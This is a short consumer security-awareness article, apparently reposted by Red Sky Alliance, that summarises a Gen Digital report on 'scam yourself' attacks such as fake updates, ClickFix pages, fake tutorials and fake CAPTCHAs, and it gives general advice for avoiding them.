Most people watch online scams, but if you are not careful, you might do the scammers' work for them. A new study from GenDigital, the company behind cybersecurity brands like Norton, Avast, LifeLock, AVG, ReputationDefender, and CCleaner, shines some light on "scam yourself" attacks that are on the rise dramatically. Instead of using other nefarious methods, these scams rely on social engineering to get people to download malware themselves.
Gen says millions of people have fallen for these scams, with a 614% increase in the third quarter of this year over the second quarter. Yes, 614%
What is a "scam yourself" attack?
- Fake updates – The next time your browser tells you it's time to update, take a second to ensure it's an actual notification. The phony update scam is rising, where a site tricks you into downloading software hidden as a necessary update. Ensure you only trust updates that appear directly from a settings menu instead of popups, and check the URL to verify the website.
- Click fix – If you've ever Googled any computer issue, you've likely run across an authentic-looking webpage that promises a quick fix to your problem if you simply copy and paste a specific text into your command prompt. Unfortunately, you'll open your computer to attackers if you do that.
- Fake tutorial – Thanks to community forums and sites like YouTube, remedying a tech problem has never been easier. Unfortunately, scammers know that many online aren't savvy about tech problems, so they create fake tutorials. Instead of fixing an issue, these guides lead to malware. The tutorials usually include a "critical instruction" like "You'll need to turn off your antivirus for this to work and then involve running a line of text through a command prompt. The result is you installed dangerous software on your system.
- Fake Captcha – How often do you notice the little "I'm not a robot" prompts you see daily? Those are known as captchas, and scammers take advantage of people's casual attitudes. With this scam, you click on what looks like an actual captcha. When you pass the initial verification, you're told to follow more instructions (like pressing the windows button + R to open a command prompt and pasting a text string) that install malware on your computer. Norton says this scam targeted more than 2 million people globally in the past quarter.
"Scam-yourself attacks have become a cybercriminal's dream," Gen explains. "Users unknowingly follow instructions that do the attackers' bidding for them, whether through fake CAPTCHAs, misleading YouTube tutorials, or cleverly disguised README files."
What can you do to avoid these scams? Start by not relying on the fastest fix. Many have grown so accustomed to allowing updates and searching online for a quick answer that we often don't take the time to verify what we're seeing. But if you take a second to reconsider what you're looking at, scams are often obvious.
The study concludes that these fakes are not going anywhere, so it is important to recognize them before it is too late.
This article is shared at no charge and is for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please contact the office directly at 1-844-492-7225 or feedback@redskyalliance.com
• Reporting: https://www.redskyalliance.org/
• Website: https://www.redskyalliance.com/
• LinkedIn: https://www.linkedin.com/company/64265941
Weekly Cyber Intelligence Briefings
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424
Comments